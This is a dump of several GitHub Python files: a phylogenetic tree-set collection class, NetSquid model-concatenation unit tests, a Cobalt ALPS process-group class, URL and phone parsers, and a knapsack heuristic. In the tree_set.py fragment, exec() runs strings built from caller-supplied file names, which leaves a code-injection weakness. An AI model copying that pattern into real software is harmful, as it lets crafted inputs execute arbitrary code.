isinstance(other, tree_set):\r\n return set_collection(self.collection + [other])\r\n else:\r\n remove = list()\r\n for i, element in enumerate(other):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n\r\n exec(f\"other.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n for i in remove[::-1]:\r\n other.pop(i)\r\n\r\n return set_collection(self.collection + other)\r\n\r\n def __str__(self):\r\n computed = \"not computed\"\r\n if type(self.distance_matrix) != type(None):\r\n computed = \"computed\"\r\n\r\n summary = f\"─────────────────────────────\\\r\n \\n Tree set collection containing {self.n_trees} trees;\\\r\n \\n File: {self.file};\\n Distance matrix: {computed}.\\\r\n \\n───────────────────────────── \\n\"\r\n for key, value in self.data.items():\r\n summary += f\"{key}; Containing {value['n_trees']} trees. \\n\"\r\n\r\n return summary\r\n\r\n # concatenate is a more formal method to concatenate collections\r\n # using this allows for more clarity in the codebase\r\n def concatenate(self, other):\r\n \"\"\"Concatenates two collectionsor collection and tree_set\r\n\r\n Args:\r\n other (tree_set ot set_colletion): tree_set ot set_colletion\r\n\r\n Returns:\r\n set_collection: concatenated set_collection\r\n \"\"\"\r\n if isinstance(other, set_collection):\r\n return set_collection(self.collection + other.collection)\r\n elif isinstance(other, tree_set):\r\n return set_collection(self.collection + [other])\r\n else:\r\n remove = list()\r\n for i, element in enumerate(other):\r\n if not isinstance(element, tree_set):\r\n if isinstance(element, str):\r\n try:\r\n file = os.path.splitext(os.path.basename(element))[0]\r\n exec(f\"{file} = tree_set('{element}')\")\r\n remove.append(i)\r\n except FileNotFoundError:\r\n sys.exit(f\"File {element} not found\")\r\n except TypeError:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n\r\n exec(f\"other.append({file})\")\r\n\r\n else:\r\n sys.exit(\r\n \"You can concatenate a set_collection \\\r\n only with another set_collection, a tree_set,\\\r\n or a list of tree_set\"\r\n )\r\n for i in remove[::-1]:\r\n other.pop(i)\r\n\r\n return set_collection(self.collection + other)\r\n","repo_name":"AndreaRubbi/Pear-EBI","sub_path":"pear_ebi/tree_set.py","file_name":"tree_set.py","file_ext":"py","file_size_in_byte":33264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"33457317883","text":"# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# \n# File: test_concatenatingmodels.py\n# \n# This file is part of the NetSquid package (https://netsquid.org).\n# It is subject to the NetSquid Software End User License Conditions.\n# A copy of these conditions can be found in the LICENSE.md file of this package.\n# \n# NetSquid Authors\n# ================\n# \n# NetSquid is being developed within [Quantum Internet division](https://qutech.nl/research-engineering/quantum-internet/) at QuTech.\n# QuTech is a collaboration between TNO and the TUDelft.\n# \n# Active authors (alphabetical):\n# \n# - Tim Coopmans (scientific contributor)\n# - Chris Elenbaas (software developer)\n# - David Elkouss (scientific supervisor)\n# - Rob Knegjens (tech lead, software architect)\n# - Iñaki Martin Soroa (software developer)\n# - Julio de Oliveira Filho (software architect)\n# - Ariana Torres Knoop (HPC contributor)\n# - Stephanie Wehner (scientific supervisor)\n# \n# Past authors (alphabetical):\n# \n# - Axel Dahlberg (scientific contributor)\n# - Damian Podareanu (HPC contributor)\n# - Walter de Jong (HPC contributor)\n# - Loek Nijsten (software developer)\n# - Martijn Papendrecht (software developer)\n# - Filip Rozpedek (scientific contributor)\n# - Matt Skrzypczyk (software contributor)\n# - Leon Wubben (software developer)\n# \n# The simulation engine of NetSquid depends on the pyDynAA package,\n# which is developed at TNO by Julio de Oliveira Filho, Rob Knegjens, Coen van Leeuwen, and Joost Adriaanse.\n# \n# Ariana Torres Knoop, Walter de Jong and Damian Podareanu from SURFsara have contributed towards the optimization and parallelization of NetSquid.\n# \n# Hana Jirovska and Chris Elenbaas have built Python packages for MacOS.\n# \n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# This file uses NumPy style docstrings: https://github.com/numpy/numpy/blob/master/doc/HOWTO_DOCUMENT.rst.txt\n\n\"\"\"Unit tests for concatenating different types of models.\n\n\"\"\"\nimport unittest\nimport netsquid as ns\nimport numpy as np\nfrom netsquid.qubits import ketutil as ku\nfrom netsquid.qubits.qubit import Qubit\nfrom netsquid.qubits import qformalism as qform\nfrom netsquid.qubits import qubitapi as qapi\nfrom netsquid.components.models.model import Model, ModelCompositionException\nfrom netsquid.components.models.delaymodels import DelayModel, GaussianDelayModel, FixedDelayModel\nfrom netsquid.components.models.errormodels import ErrorModel\nfrom netsquid.components.models.cerrormodels import ClassicalErrorModel\nfrom netsquid.components.models.qerrormodels import QuantumErrorModel, DepolarNoiseModel, DephaseNoiseModel, \\\n T1T2NoiseModel, FibreLossModel\n\n\nclass NonComposableModel(Model):\n\n def compute_model(self, *args, **kwargs):\n pass\n\n\nclass ExampleModel(Model):\n\n def __init__(self, value=0):\n super().__init__()\n self.value = value\n\n def compute_model(self, items, *args, **kwargs):\n for i in range(len(items)):\n items[i] **= self.value\n\n @classmethod\n def concatenation_class(cls):\n return ExampleModel\n\n\nclass ExampleAddModel(ExampleModel):\n\n def compute_model(self, items, addition=0, *args, **kwargs):\n for i in range(len(items)):\n items[i] += addition\n\n\nclass ExampleMultiplicationModel(ExampleModel):\n def compute_model(self, items, multiplier=1, *args, **kwargs):\n for i in range(len(items)):\n items[i] *= multiplier\n\n\nclass TestConcatModels(unittest.TestCase):\n\n def test_init(self):\n \"\"\"Test initialisation of concatenated models \"\"\"\n m1 = ExampleModel(2)\n m2 = ExampleModel(3)\n self.assertEqual(len(m1), 1)\n self.assertFalse(m1.is_concatenated)\n self.assertFalse(m2.is_concatenated)\n m3 = m1 + m2\n self.assertTrue(m3.is_concatenated)\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n self.assertIsInstance(m3, m1.concatenation_class())\n self.assertTrue(m1 in m3)\n self.assertTrue(m2 in m3)\n self.assertFalse(m3 in m2)\n self.assertFalse(m1 in m2)\n\n def test_order(self):\n \"\"\"Test if models are computed in the right order\"\"\"\n m1 = ExampleModel(2)\n m2 = ExampleModel(3)\n m3 = m1 + m2\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items)\n self.assertListEqual(items, [1, 4 ** 3, 9 ** 3, 16 ** 3, 25 ** 3])\n m4 = m2 + m1\n self.assertEqual(len(m4), 2)\n self.assertIsInstance(m4, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m4(items)\n self.assertListEqual(items, [1, 8 ** 2, 27 ** 2, 64 ** 2, 125 ** 2])\n\n def test_arguments(self):\n \"\"\"Check if arguments are correctly passed through\"\"\"\n m1 = ExampleAddModel()\n m2 = ExampleMultiplicationModel()\n m3 = m1 + m2\n self.assertEqual(len(m3), 2)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=4, multiplier=2)\n self.assertListEqual(items, [10, 12, 14, 16, 18])\n\n def test_multiplying(self):\n \"\"\"Test for multiplying models to repeat them\"\"\"\n m1 = ExampleAddModel()\n m2 = ExampleMultiplicationModel()\n m3 = 5 * m1\n self.assertEqual(len(m3), 5)\n self.assertNotIn(m1, m2)\n self.assertIn(m1, m3)\n self.assertNotIn(m3, m1)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=3)\n self.assertListEqual(items, [16, 17, 18, 19, 20])\n m3 = m1 * 5\n self.assertEqual(len(m3), 5)\n self.assertIn(m1, m3)\n self.assertNotIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n m3(items, addition=3)\n self.assertListEqual(items, [16, 17, 18, 19, 20])\n m3 = 5 * (m1 + m2) # != 5*m1 + 5*m2 if m1 and m2 are not commutative\n self.assertEqual(len(m3), 10)\n self.assertIn(m1, m3)\n self.assertIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n expected_list = items[:]\n m3(items, addition=3, multiplier=2)\n for _ in range(5):\n for i in range(len(expected_list)):\n expected_list[i] = (expected_list[i] + 3) * 2\n self.assertListEqual(items, expected_list)\n m3 = 5 * m1 + 5 * m2\n self.assertEqual(len(m3), 10)\n self.assertIn(m1, m3)\n self.assertIn(m2, m3)\n self.assertIsInstance(m3, ExampleModel)\n items = [1, 2, 3, 4, 5]\n expected_list = items[:]\n m3(items, addition=3, multiplier=2)\n for i in range(len(expected_list)):\n expected_list[i] = (expected_list[i] + 5 * 3) * (2 ** 5)\n self.assertListEqual(items, expected_list)\n\n with self.assertRaises(TypeError):\n \"1\" * m1\n with self.assertRaises(TypeError):\n m1 * m2\n with self.assertRaises(TypeError):\n m1 * True\n with self.assertRaises(ValueError):\n m1 * 0\n with self.assertRaises(ValueError):\n m1 * -1\n with self.assertRaises(TypeError):\n m1 * 1.5\n\n def test_adding_not_addable(self):\n \"\"\"Test for trying to add models that can't be added\"\"\"\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() + NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() + ExampleMultiplicationModel()\n with self.assertRaises(ModelCompositionException):\n ExampleMultiplicationModel() + NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n 4 * NonComposableModel()\n with self.assertRaises(ModelCompositionException):\n NonComposableModel() * 4\n\n x = NonComposableModel()\n self.assertEqual(len(x), 1)\n self.assertIn(x, x)\n y = 1 * x\n z = x * 1\n self.assertIn(z, y)\n self.assertIs(x, y)\n self.assertIs(z, x)\n\n\nclass TestConcatQuantumModels(unittest.TestCase):\n\n def test_depolar_concat(self):\n \"\"\"Test concatenation two depolar noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DepolarNoiseModel(p1, time_independent=True)\n m2 = DepolarNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q = ns.qubits.create_qubits(1)[0]\n m3([q, None])\n p = (1 - (1 - p1) * (1 - p2)) / 2\n self.assertTrue(np.allclose(\n qapi.reduced_dm(q),\n p * ku.ket2dm(ns.s1) + (1 - p) * ku.ket2dm(ns.s0)))\n\n def test_dephase_concat(self):\n \"\"\"Test concatenation two dephase noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DephaseNoiseModel(p1, time_independent=True)\n m2 = DephaseNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q = ns.qubits.create_qubits(1)[0]\n ns.qubits.operate(q, ns.H)\n m3([None, q])\n ns.qubits.operate(q, ns.H)\n p = (1 - (1 - p1) * (1 - p2)) / 2\n self.assertTrue(np.allclose(\n qapi.reduced_dm(q),\n p * ku.ket2dm(ns.s0) + (1 - p) * ku.ket2dm(ns.s1)))\n\n def test_dephase_plus_depolar(self):\n \"\"\"Test concatenation of a depolar with a dephase\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.7\n p2 = 0.2\n m1 = DephaseNoiseModel(p1, time_independent=True)\n m2 = DepolarNoiseModel(p2, time_independent=True)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n m1([None, q2])\n m2([None, q2, None])\n m3([q1, None])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_concat_T1T2(self):\n \"\"\"Test concatenation two T1T2 noise models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n m1 = T1T2NoiseModel(400, 300)\n m2 = T1T2NoiseModel(200, 120)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n m1([None, q2])\n m2([None, q2, None])\n m3([q1, None])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_much_concatenation(self):\n \"\"\"Test concatenating lots of quantum error models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n m = {0: T1T2NoiseModel(400), 1: T1T2NoiseModel(T2=120), 2: DephaseNoiseModel(0.44, time_independent=True),\n 3: DepolarNoiseModel(0.44, time_independent=True), 4: T1T2NoiseModel(200, 120), 5: DepolarNoiseModel(0.78),\n 6: DephaseNoiseModel(0.2)}\n big_model = m[0]\n for i in range(1, 6):\n big_model += m[i]\n self.assertIsInstance(big_model, QuantumErrorModel)\n q1, q2 = ns.qubits.create_qubits(2)\n ns.qubits.operate(q1, ns.H)\n ns.qubits.operate(q2, ns.H)\n for model in m.values():\n model([None, q2, None])\n big_model([q1])\n self.assertTrue(np.allclose(qapi.reduced_dm(q1), qapi.reduced_dm(q2)))\n\n def test_loss_model_concat(self):\n \"\"\"Test concatenating loss models\"\"\"\n qform.set_qstate_formalism(qform.QFormalism.DM)\n p1 = 0.2\n p2 = 0.5\n p = p1 + p2 - p1 * p2 # probability that a qubit gets lost with two loss models\n m1 = FibreLossModel(p_loss_init=p1)\n m2 = FibreLossModel(p_loss_init=p2)\n m3 = m1 + m2\n self.assertIsInstance(m3, QuantumErrorModel)\n n = 50000\n qubits = ns.qubits.create_qubits(n)\n m3(qubits, length=0)\n nones = 0\n for qubit in qubits:\n if qubit is None:\n nones += 1\n self.assertAlmostEqual(nones, p * n, delta=n / 100)\n\n\nclass ExampleClassicalErrorModel(ClassicalErrorModel):\n def error_operation(self, items, delta_time=0, **kwargs):\n for i in range(len(items)):\n items[i] += 4\n\n\nclass TestConcatErrorModel(unittest.TestCase):\n\n def test_adding_classical_with_quantum(self):\n \"\"\"Test adding a classical with a quantum error model\"\"\"\n m1 = DephaseNoiseModel(0.4)\n m2 = ExampleClassicalErrorModel()\n m3 = m1 + m2\n self.assertIsInstance(m3, ErrorModel)\n\n # Test that doing this is completely useless as everything you input gets rejected by one or the other class\n with self.assertRaises(TypeError):\n m3([Qubit(\"test_qubit\")])\n with self.assertRaises(TypeError):\n m3([\"Test\"])\n\n\nclass TestConcatClassicalErrorModel(unittest.TestCase):\n\n def test_adding_classical(self):\n \"\"\"Test adding a classical error model\"\"\"\n m1 = ExampleClassicalErrorModel()\n m2 = ExampleClassicalErrorModel()\n m3 = m1 + m2\n self.assertIsInstance(m3, ClassicalErrorModel)\n\n with self.assertRaises(TypeError):\n m3([Qubit(\"test_qubit\")])\n\n\nclass TestConcatDelayModels(unittest.TestCase):\n\n def test_adding_delay_model(self):\n \"\"\"Test adding delay models\"\"\"\n m1 = FixedDelayModel(4)\n m2 = GaussianDelayModel(10, 0)\n m3 = m1 + m2 + m1\n self.assertIsInstance(m3, DelayModel)\n\n self.assertEqual(m3(), 18)\n self.assertEqual(m3.generate_delay(), 18)\n self.assertEqual(m3.get_mean(), 18)\n\n with self.assertRaises(ModelCompositionException):\n m3.set_mean(4)\n\n with self.assertRaises(ModelCompositionException):\n m3.get_std()\n\n\n# Test for inheritances\n\nclass TestModel(Model):\n\n def noise_operation(self, qubits, delta_time=0, **kwargs):\n pass\n\n def __init__(self, p=0):\n super().__init__()\n self.p = p\n\n @classmethod\n def concatenation_class(cls):\n return TestModel\n\n def compute_model(self, l):\n if self.is_concatenated:\n for model in self._models:\n l = model(l)\n else:\n l[0] = l[0] ** self.p\n return l\n\n\nclass A(TestModel):\n @classmethod\n def concatenation_class(cls):\n return A\n\n\nclass B(A):\n @classmethod\n def concatenation_class(cls):\n return B\n\n\nclass C(B):\n @classmethod\n def concatenation_class(cls):\n return C\n\n\nclass D(A):\n pass\n\n\nclass E(D):\n @classmethod\n def concatenation_class(cls):\n return E\n\n\nclass F(E):\n @classmethod\n def concatenation_class(cls):\n return F\n\n\nclass G(C, E):\n pass\n\n\nclass TestComposableModels(unittest.TestCase):\n\n def test_concatenation(self):\n \"\"\"Test basic concatenation\"\"\"\n model1 = TestModel()\n model2 = TestModel()\n model3 = TestModel()\n\n model12 = model1 + model2\n self.assertIsInstance(model12, TestModel)\n self.assertEqual(len(model12), 2)\n self.assertTrue(model1 in model12)\n self.assertTrue(model2 in model12)\n self.assertFalse(model12 in model12)\n model123 = model3 + model12\n self.assertIsInstance(model123, TestModel)\n self.assertEqual(len(model123), 3)\n self.assertTrue(model1 in model123)\n self.assertTrue(model2 in model123)\n self.assertTrue(model3 in model123)\n self.assertFalse(model12 in model123)\n # order\n self.assertEqual(model123._concatenated_models[0], model3)\n self.assertEqual(model123._concatenated_models[1], model1)\n self.assertEqual(model123._concatenated_models[2], model2)\n\n with self.assertRaises(TypeError):\n TestModel() + 1\n\n def test_self_concatenation(self):\n \"\"\"Test adding models to themselves\"\"\"\n model1 = TestModel()\n model2 = model1 + model1\n\n self.assertIsInstance(model2, TestModel)\n self.assertEqual(len(model2), 2)\n\n def test_required_properties(self):\n \"\"\"Test if required properties are correctly copied over\"\"\"\n model1 = TestModel()\n model1._required_properties = [\"a\", \"b\"]\n\n model2 = TestModel()\n model2._required_properties = [\"a\", \"c\"]\n\n model12 = model1 + model2\n\n self.assertEqual(len(model12.required_properties), 3)\n self.assertTrue(\"a\" in model12.required_properties)\n self.assertTrue(\"b\" in model12.required_properties)\n self.assertTrue(\"c\" in model12.required_properties)\n\n model1._required_properties = [\"d\", \"e\"]\n self.assertEqual(len(model12.required_properties), 4)\n self.assertTrue(\"a\" in model12.required_properties)\n self.assertFalse(\"b\" in model12.required_properties)\n self.assertTrue(\"c\" in model12.required_properties)\n self.assertTrue(\"d\" in model12.required_properties)\n self.assertTrue(\"e\" in model12.required_properties)\n\n with self.assertRaises(ValueError):\n model12.required_properties = [\"k\"]\n\n self.assertTrue(model12.validate(a=1, b=2, c=3, d=4, e=5, f=6))\n self.assertTrue(model12.validate(a=1, c=3, d=4, e=5))\n self.assertFalse(model12.validate(a=1, c=3))\n self.assertFalse(model12.validate(d=1, e=3))\n\n def test_compute_model(self):\n \"\"\"Test if the models are executed in the correct order\"\"\"\n model1 = TestModel(3)\n model2 = TestModel(4)\n model12 = model1 + model2\n x = [2]\n model12(x)\n self.assertEqual(x[0], (2 ** 3) ** 4)\n model21 = model2 + model1\n x = [2]\n model21(x)\n self.assertEqual(x[0], (2 ** 4) ** 3)\n\n def test_diff_noise_model_concatenation(self):\n \"\"\"Test concatenation ability of different type of noise models\"\"\"\n\n self.assertEqual(type(A()), A)\n\n self.assertEqual(type(A() + A()), A)\n self.assertEqual(type(A() + B()), A)\n self.assertEqual(type(B() + B()), B)\n self.assertEqual(type(C() + F()), A)\n self.assertEqual(type(F() + C()), A)\n self.assertEqual(type(D() + D()), A)\n self.assertEqual(type(F() + F()), F)\n self.assertEqual(type(E() + B()), A)\n self.assertEqual(type(B() + E()), A)\n self.assertEqual(type(F() + E()), E)\n self.assertEqual(type(E() + F()), E)\n self.assertEqual(type(G() + F()), A)\n\n self.assertEqual(type(A() + A() + A()), A)\n self.assertEqual(type(A() + B() + B()), A)\n self.assertEqual(type(B() + B() + B()), B)\n self.assertEqual(type(C() + F() + G()), A)\n self.assertEqual(type(F() + C() + D()), A)\n self.assertEqual(type(D() + D() + E()), A)\n self.assertEqual(type(F() + F() + F()), F)\n self.assertEqual(type(E() + B() + C()), A)\n self.assertEqual(type(B() + E() + F()), A)\n self.assertEqual(type(F() + E() + F()), E)\n self.assertEqual(type(E() + F() + E()), E)\n self.assertEqual(type(G() + F() + G()), A)\n\n self.assertEqual(type((A() + A()) + (A() + A())), A)\n self.assertEqual(type((A() + B()) + (A() + B())), A)\n self.assertEqual(type((B() + B()) + (B() + B())), B)\n self.assertEqual(type((C() + F()) + (C() + F())), A)\n self.assertEqual(type((F() + C()) + (F() + C())), A)\n self.assertEqual(type((D() + D()) + (D() + D())), A)\n self.assertEqual(type((F() + F()) + (F() + F())), F)\n self.assertEqual(type((E() + B()) + (E() + B())), A)\n self.assertEqual(type((B() + E()) + (B() + E())), A)\n self.assertEqual(type((F() + E()) + (F() + E())), E)\n self.assertEqual(type((E() + F()) + (E() + F())), E)\n self.assertEqual(type((G() + F()) + (G() + F())), A)\n\n def test_multiplication(self):\n \"\"\"Test multiplication of models\"\"\"\n\n x = A() * 5\n self.assertEqual(type(x), A)\n self.assertEqual(len(x), 5)\n\n x = 5 * A()\n self.assertEqual(type(x), A)\n self.assertEqual(len(x), 5)\n\n x = 5 * A() * 5\n self.assertEqual(len(x), 25)\n self.assertEqual(type(x), A)\n\n a = A()\n x = a * 1\n self.assertEqual(x, a)\n\n x = 1 * a\n self.assertEqual(a, x)\n\n with self.assertRaises(TypeError):\n A() * B()\n\n with self.assertRaises(TypeError):\n \"a\" * A()\n\n with self.assertRaises(TypeError):\n A() * \"b\"\n\n with self.assertRaises(ValueError):\n -1 * A()\n\n with self.assertRaises(ValueError):\n A() * -1\n\n with self.assertRaises(TypeError):\n 1.5 * A()\n\n with self.assertRaises(TypeError):\n A() * 1.5\n\n with self.assertRaises(TypeError):\n 1.0 * A()\n\n with self.assertRaises(TypeError):\n A() * 1.0\n\n a = A(3) + A(2) * 3 + 2 * A(3)\n x = [2]\n a(x)\n self.assertEqual(len(a), 6)\n self.assertEqual(x[0], (((((2 ** 2) ** 2) ** 2) ** 3) ** 3) ** 3)\n\n ef = 2 * (E(3) + 2 * F(2))\n self.assertEqual(len(ef), 6)\n x = [2]\n ef(x)\n self.assertEqual(x[0], (((((2 ** 3) ** 2) ** 2) ** 3) ** 2) ** 2)\n\n def test_diamond_model(self):\n \"\"\"Test logic when adding models with multiple inheritance (such as diamond structure of models)\"\"\"\n\n # since H subclasses both C and F..\n class H(F, C):\n pass\n\n self.assertEqual(type(H() + C()), A) # Should this be CC?\n self.assertEqual(type(H() + F()), F) # Should this be AC?\n self.assertEqual(type(H() + H()), F) # What should this be?\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"danilopag/Quantum-Internet-Payment","sub_path":"lib/python3.10/site-packages/netsquid/components/models/tests/test_concatenatingmodels.py","file_name":"test_concatenatingmodels.py","file_ext":"py","file_size_in_byte":21885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"10766675682","text":"import time\nimport logging\n\nfrom Cobalt.Util import init_cobalt_config, get_config_option\nfrom Cobalt.DataTypes.ProcessGroup import ProcessGroup\n\n_logger = logging.getLogger(__name__)\n\ninit_cobalt_config()\n\nPGROUP_STARTUP_TIMEOUT = float(get_config_option('alpssystem', 'pgroup_startup_timeout', 120.0))\nUSER_SESSION_HOSTS = [host.strip() for host in\n get_config_option('alpssystem', 'user_session_hosts', '').split(':')]\n\nclass ALPSProcessGroup(ProcessGroup):\n '''ALPS-specific PocessGroup modifications.'''\n\n def __init__(self, spec):\n super(ALPSProcessGroup, self).__init__(spec)\n self.alps_res_id = spec.get('alps_res_id', None)\n self.interactive_complete = False\n now = int(time.time())\n self.startup_timeout = int(spec.get(\"pgroup_startup_timeout\",\n now + PGROUP_STARTUP_TIMEOUT))\n\n def start(self):\n '''Start the process group. The ALPS version also sets the host to use.\n This host is in a list provided by the configuration file. If the host\n has an alps_script_forker instance running on it, those currently\n running jobs will be taken into account when selecting where to run.\n\n The forker host with the lowest number of locations\n\n Args:\n None\n\n Returns:\n None\n\n Raises:\n ProcessGroupStartupError: The start for the process group has failed\n and no child process id has been returned.\n\n Side Effects:\n Prompts the specified forker to start a job. In the event of an\n interactive job, sets a fake head pid (1) and notes which host\n should be used for the interactive job launch.\n\n '''\n if self.mode == 'interactive':\n if len(USER_SESSION_HOSTS):\n pass\n return super(ALPSProcessGroup, self).start()\n","repo_name":"ido/cobalt","sub_path":"src/lib/Components/system/ALPSProcessGroup.py","file_name":"ALPSProcessGroup.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"13035580323","text":"from dataclasses import dataclass\nfrom urllib.parse import urlparse\nimport re\nfrom exceptions import RtsfUrlParseError, PhoneParseError\n\n\nclass BaseParser:\n def __init__(self, value: str) -> None:\n self._value = value\n\n\n@dataclass\nclass RtsfUrlParsingResult:\n url: str\n evks_player_id: int\n\n\nclass RtsfUrlParser(BaseParser):\n \"\"\"https://rtsf.ru/ratings/player/{evks_player_id}\"\"\"\n\n player_path_re = re.compile(r\"(^/ratings/player/)([0-9]+$)\")\n\n def parse(self) -> RtsfUrlParsingResult:\n url = self._value.strip()\n parsed = urlparse(url)\n\n if parsed.netloc != \"rtsf.ru\":\n raise RtsfUrlParseError(\"Must be rtsf.ru\", url)\n\n path_match = self.player_path_re.match(parsed.path)\n if not path_match:\n raise RtsfUrlParseError(\"URL path does not match expected regexp\", url)\n\n player_id = int(path_match.groups()[1])\n return RtsfUrlParsingResult(url=url, evks_player_id=player_id)\n\n\nclass PhoneParser(BaseParser):\n phone_re = re.compile(r\"^(\\+7|7|8)\\d{10}$\")\n\n def parse(self) -> str:\n phone = (\n self._value.strip()\n .replace(\" \", \"\")\n .replace(\"-\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n )\n phone_match = self.phone_re.match(phone)\n if not phone_match:\n raise PhoneParseError(\"Phone does not match expected regexp\", phone)\n\n return self._format_phone(phone_match.group())\n\n def _format_phone(self, parsed_phone: str) -> str:\n if parsed_phone.startswith(\"7\") or parsed_phone.startswith(\"8\"):\n phone = parsed_phone[1:]\n else:\n phone = parsed_phone[2:]\n\n return \"+7 ({prefix}) {first}-{second}-{third}\".format(\n prefix=phone[:3], first=phone[3:6], second=phone[6:8], third=phone[8:]\n )\n","repo_name":"nkuznetsov44/foospollbot","sub_path":"foospollbot/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9066065803","text":"from sys import argv\r\nfrom time import time\r\n\r\n#usage heuristic.py -time/-notime path_to_input_file\r\nID_pos = 0\r\nn_pos = 1\r\nM_pos = 2\r\nstart_pos = 3\r\n\r\n#kontrola parametru\r\ndef checkParam():\r\n try:\r\n if argv[1] != '-time' and argv[1] != '-notime':\r\n return False\r\n spam = argv[2]\r\n except IndexError:\r\n return False\r\n return True\r\n\r\n#porovnavaci kriterium sortu\r\ndef getKey(elem):\r\n return elem[2]\r\n\r\n#reseni\r\ndef solve(n, M, buffer):\r\n buffer.sort(key=getKey, reverse=True) #serazeni podle heuristiky\r\n bagWeight = 0\r\n bagPrice = 0\r\n usedItems = []\r\n for x in buffer: #pridavani polozek do zaplneni batohu\r\n if bagWeight + x[0] <= M:\r\n bagWeight = bagWeight + x[0]\r\n bagPrice = bagPrice + x[1]\r\n usedItems.append(x[3])\r\n else:\r\n break\r\n return bagPrice, usedItems\r\n\r\n\r\ndef main():\r\n #kontrola parametru, otevreni souboru\r\n if not checkParam():\r\n print('Invalid parameters')\r\n exit(1)\r\n try:\r\n f = open(argv[2])\r\n except FileNotFoundError:\r\n print('File does not exist')\r\n exit(1)\r\n #nacteni a parsovani souboru\r\n lines = f.readlines()\r\n\r\n for line in lines:\r\n words = line.split(' ')\r\n buffer = []\r\n try: #prochazeni a ukladani instanci\r\n ID = int(words[ID_pos])\r\n n = int(words[n_pos])\r\n M = int(words[M_pos])\r\n index = 0\r\n i = 0\r\n while i < 2 * n:\r\n weight = int(words[start_pos + i])\r\n price = int(words[start_pos + i + 1])\r\n buffer.append((weight, price, price / weight, index))\r\n i = i + 2\r\n index = index + 1\r\n except IndexError:\r\n print('Invalid data format')\r\n exit(1)\r\n except ValueError:\r\n print('Invalid data format')\r\n exit(1)\r\n start_time = time() #mereni casu reseni instance\r\n price, usedItems = solve(n, M, buffer) #reseni instance\r\n if argv[1] == '-time': #vypis reseni a popripade casu\r\n stop_time = time()\r\n print(\"--- Instance %s completed, time %s seconds ---\" % (ID, stop_time - start_time))\r\n print(ID, n, price, end=' ')\r\n for x in range(n):\r\n if x in usedItems:\r\n print('', '1', end='')\r\n else:\r\n print('', '0', end='')\r\n print('')\r\n\r\nif __name__ == '__main__':\r\n start_time = time()#mereni celkoveho casu\r\n main()\r\n if argv[1] == '-time':\r\n stop_time = time()\r\n print('Total time: %s seconds' % (stop_time - start_time))","repo_name":"vojtyys/PAA_1","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
